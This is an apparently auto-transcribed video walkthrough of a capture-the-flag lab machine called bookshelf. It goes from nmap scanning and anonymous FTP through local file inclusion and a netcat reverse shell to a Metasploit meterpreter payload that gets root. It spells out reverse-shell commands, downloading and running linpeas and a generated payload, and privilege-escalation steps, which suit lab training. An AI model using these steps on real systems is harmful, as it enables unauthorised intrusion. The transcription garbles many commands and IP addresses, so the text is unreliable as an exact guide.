Hello guys, welcome back to Pentester Club. Today we're going to solve another CTF challenge name called a bookshelf. So what is the basic penetration testing methodologies we use here? So the basic penetration testing methodologies we use here: network discovery, enumeration, exploitation, privilege escalation, and capture the flag. So first, open the terminal. So first we just type here as sudo su, enter your password, then you just type here as net discount minus I is 0. So first we would like to identify our target machine. So I have identified my target machine is here. So this is my targeted IP address 192.168.18.161. So I just quit now. You just type here as nmap minus 34 minus a is an aggressive scan and enter your targeted IP address. So let's wait for the nmap result. So let me I just make a little bit big. So I have got the nmap result. One is available within this is my targeted IP. Here is I got the nmap result. One is available with an FTP where we have found it was allowed for anonymous login. So we would like to log in. Another one is available with SH. Another one is available with port 8. So let we try to open a new tab. You just type here as a FTP. Enter your target IP address 192.168.18.161 and enter with anonymous and anonymous. So we have login successfully. Now just type list minus a. Now just type here as a get a web pass.txt. So where you can see here we have got the web.txt. So you just type clear exit. Now just type clear. Now just type list. You just type cat a web pass.txt. So where we have a web password.txt files. So now what we would like to do here is, so first we would like to walk to the our targeted domain. So you just type here as 192.168.18.161. So you can see here a bookshelf. It was available for a target like Ubuntu Linux, uh, the web application hacker handbook. So you have found here a bunch of pretty of things. So just entirely just copy this one. Now let's come back here. So first we would like to do it as directory buster. Let me paste it. So it's not yet given with the HTTP. Now let me just try here. What is the useful information we can get it here? So I have got here as one is with just copy. There you just type here as a curl. Let me paste it. So user agent disallow 404 a developer. So you cannot able to log in this one. So we need to try much more harder. Okay, that's great. To try a much more harder. So what we would like to do here? Then we just try also here as a root 301 mode here is permanently. That's it. So we would like to look here is come back here. So just enter your so it was a forbidden. That's great. Now we just try here as a something. If this was forbidden, so we can't able to access or crack anything something else apart from that. So now I would like to go with as a directory buster. So sorry, I would like to go with as go buster. So if you know how, just type yes, enter your password. So it will install the go buster. That was done. Just type clear. You just type go buster. Then you just type directory minus q. You just type http enter your target address 192.168.18.161. Now we just type here as word list is user share word list. Then you just type here as directory master. Then you just type here as directory list 2.3 medium.txt. That's it. Now I just need to get an extensions with a PHP, then .html, then I would like to get a I would like to get a txt, then I would like to get a backup file. So we would like to look here where I have got it here, robots.txt, a root.txt, a root. Now let what else we can get here. So, once we would like to look here from this, welcome to a bookshelf, choose a online. So we would like to look from here. We have here as a login. We just try here as a admin and admin, uh, wrong credentials, error name or password. Okay, that's great. Now, we would like to utilize is something. So where it get a root. Now I would like to try here as something. I would like to put as a directory. So let me I just put here as http, then 161, and I just type here as a root. So after the root, what else we can get? Let we would like to look from here. So from the directory buster, I get like images. That's it. So we just close this here. Now we have here as a root. There is like a login. So we just entirely just copy from here as a login. Now just type it as directory buster. Then let me paste it. Then we just try here as a login. So where I have got it here as a admin. So just copy, come back here in the new tab. So we just try here as a admin. It was forbidden. Okay, no worries. Uh, Now, uh, we not yet get anything else apart from this. So, we have got as an admin. That was great. That was is also a forbidden. So, where we would like to try only utilizing this one. So just copy this one, come back here. So we need to enumerate very clear from here. So just type clear. Now we just need to enumerate the uh, from here. So I would like to utilize only this one. Now let's come back here. So let me I delete this. So let me paste it here. So we just try here. Now I have got one is with admin. Uh, okay. So just copy this one. Now let me you just try here again as with an admin. uh, I just need to try here as admin. So I would like to make it as big. So again I have got it here as a admin. So just copy this one. Now let we are coming here as something utilizing a useful. It also a forbidden. Now we would like to look the page source. The permission is forbidden. Okay, uh, that's great. Now, we would like to do here is something. We not yet get any useful information. So it may take a too long. So I just put it here. So uh, we just need to put here a come back here. So we just type here as a admin and admin. Then let me just try here. So where are we not yet getting any useful information about this? So I would like to put only with an one. uh, admin. Then I would like to get as a PHP 1. We would like to look here. So where I have got it here as a contact.php. That's great. Now let's copy this here. Now we would like to walk here where it was a giving a 404 error. So now we can try here as local file inclusion. So you just type here as a etc password. Here I'm getting here etc as password. That's it. So we have identified the vulnerability here. Now just type id. We are getting here id. You just type here as a which netcat. No, it was a printing here as similar like that. So we are near to find this one. So uh, we have as one of the one as a issue here is come back here. So where we have identified this one, so just type here. So in the contact that is not possible. Now we just need to go with as directory buster, go with as a root. We have identified only in the here is images, I think so. Yes, so we just quit this. So we just type here as images. Then we just try here. What else we can get it here from the images? So let me try this. The images. So I have got it here. Now just type clear. Now I have got from there as OS. Now I just put here minus x.php. Now we would like to look here. What else we can get it from here? So I have got here as a feedback.php. Now we would like to walk from here. So I just open here a feedback.php. A contract, a page is under construction contract for administrator where I have got it a something useful here. So let me just copy this one. And I just type here as echo. Then let me paste it this. You just type here as a base 64 as decode. I have got it here as a path. Now we have identified the real path. So it was a little bit quite a difficult way, making you a much confusion. That's great. Now just type here as, let me paste it. You just type ID where I'm getting here a www.data. Now you just type here as a which netcat we have got it here. So now let's come back here. Now just type clear. Now just type here as I have config. Your IP address is 167. Okay. Now I just come back here. So I just clear this. So just type clear. You just type netcat minus lvnp 780. Now let me just type here as netcat minus e bin bash at reward targeted IP address 182.168.18.a677890. That's it. Now let me just try here. So where I have successfully connected, you just type here as a which Python. You got it here. You just type here as Python minus C. Import APY span bin bash. Now where I have got it here into the bin bash. Now we just type here as a pwd. We just type plus minus l. We just type here as export term equal to x term. I just type cd. Oh, I just type plus minus l. There is nothing else, so now I just directly go to our home directory. I just type plus minus l cd a defender. I just type plus minus l. I just type here as clear. I just type plus minus l. So in this, what we would like to do here is, so we can enumerate here everything. Like we just go to here see a desktop. I just write ls minus l. You just write cat dot a flag 3 dot txt. So you just write cat flag 3 dot txt. Its permission is denied. Okay, no worries. In the desktop we have one flag, and I just write come to a documents, and I just write list minus l. Come back. We just write here as a kit. And I just write list minus l. And I just come back here. You just write here. You just write list minus l. Music. And I just write list minus l. Just write pictures. And I just write list minus l. Just type cd, a public list minus l, nothing else. I just type cd templates. I just type list minus l, and I just type clear. Just type list minus l. So we just go a last one is videos, cd. I just type list minus l. I just type clear. So when we have got and nothing else from apart from here. Now uh, we try to go to here as a temp directory. Now let me just write here as this here. So we come back here and I just write this. We now have a link piece. Now just come back here. We just write link piece a GitHub. So where we need to get a link piece from the GitHub. Scroll down. We not get. So we would like to get it from here. So we would like to utilize entire of this command curl minus l. So the link is a script. Now let's come back here. So we just need to put here, paste it here, try curl not found. So just type here as wget. Now let me entirely just copy. Let me paste it here. So where we have got it here, I just write list minus l. So I just write here as bash a link is a dot sh. So it not work out like that. So I just write here as a link is a dot sh. So why it was permission is denied? So I just write list minus l. So we have a link is so let me I just put here as chmod plus x link is dot sh, and I just type here as link is dot sh. That's great. Now it was running. Let it run now. So we need to identify where we can get into the loophole and get this job done. So let it scroll down everything. So let it identify something else. Then we can look it out. You can write a file where I have got here home defender downloads in the shell. So just copy this one. Let's come back here. So let me paste. So where we have right here the files. So where I think it was done everything, now just write clear. So just write C. We just need to go to as a here, and I just write list minus L. So you just write here as cat dot uh, shelf. So it was in everything in quite difficult way. So just write here as a temp directory. Now let's just come back here. So we just try here. Just write here as clear. So just write here as MSF Venom payload for. So I would like to write a payload for a Linux x64. Just write here as meter printer. Then you just write here as uh, I would like to try here as reverse underscore at TCP. Then you just write here as L host equal to enter what Linux IP address 192.168.18.167. Oh, sorry, 67. L code equal to, you just put here as 6666. So I'm putting as a random way. So you just write file as ELF. You just put here is get a output as uh, exploit.elf. That's it. So where it will create the exploit here. So where this exploit is created, I just type here as python minus m http.server. Now we just type here as wget http, enter our call Linux IP address 192.168.867. We just type here as 8000 exploit.elf, where we have got here. Now just type plus minus l. So we have our exploit. Now we can set up a MSF console. Go to now MSF console. So once we would like to go to MSF console, let it launch this one first. Then we are near to finish this one. So I just need to copy this. So let me copy. So we just type here as set exploit multi handler. That's great. Now we just type as oh sorry. I just need to type use exploit multi handler. Now that's it. I just type here as a set a payload. So what's the payload use? So let me just put it here, our payload of our Linux x64 meter beta reverse underscore TCP. And I just type here, there is EL host equal to 192.168.18.18.a67. You just type here as set L code equal to 6666. Now we just try here as a run. So let's wait for this. Once it was started for a listening, it was started for a listening. Now just come back here. We just try here is uh, in this the background. We just try here as exploit.elf. So I just need to give permission chmod exploit.elf. Now let me run this exploit.elf, where I have got a meter pita reverse session. So now we just type here as a background. Now session is running over there. Now just type here as a such a suggester. So you just type here as use 0. Now we just type here as I just type here as a show options, and I just type a set a session one, then oh sorry, set a session one, and I just type here as a run. So it will find the right exploit here for us to do it. So now we don't need to worry for this. Now we would like this. So we just need to wait a little bit, some time. So it will find, and we can get directly as a root access from here. So now it was finding the exploits. Once we have found the exploits, now we go for direct exploit over there. So I have found here exploit a Linux for local privilege escalation. So most probably all vulnerable machines will be utilize this one only. This exploit. Any type of big target companies or XYZ things, or they can utilize only the exploit only utilize this one to get a root place access. So if you get any type of error, so you just write clear. And I just write here as uh, here as use. What else you have copied that exploit? You just paste here. You just write here as a show options. Uh, so just write show options. I have here. So just write here as set a session one where I have L port. L port is clear. So I just need to put here as L host equal to 192.168.18.18.a67. You just type here as set L port equal to a double four or double four. That's correct. Now I just type here as a run. So now we are the machine is trying to be get automatic checking is false. So now we are going to get directly the root access from here. Now let me back to look here. A meter session is open now. You can look from here. Now I just type here a chef. We have just type ID. We are directly in the root. We just type here as uh, which Python, not yet get. We just so we got here. I just write Python minus C import a pdy span bin bash. Now just type here as export term equal to extra. So sorry, export term equal to extra. You just type clear. I just type a c arrow plus minus here. I just type here as cap arrow dot next. So where we have got a root a flag. Congratulations on getting a root privileges. That's it. So we also need to look here as cd. So just type cd. Oh, I just type plus minus l cd a defender. And I just type plus minus l. And I just type here as cd a desktop. And I just type plus minus l. I just type here as cat a flag 3.txt. So congratulations on getting a normal flag. That's it. So where we have successfully completed this mission. So you try it your own guys. Thank you guys for watching and keep smiling.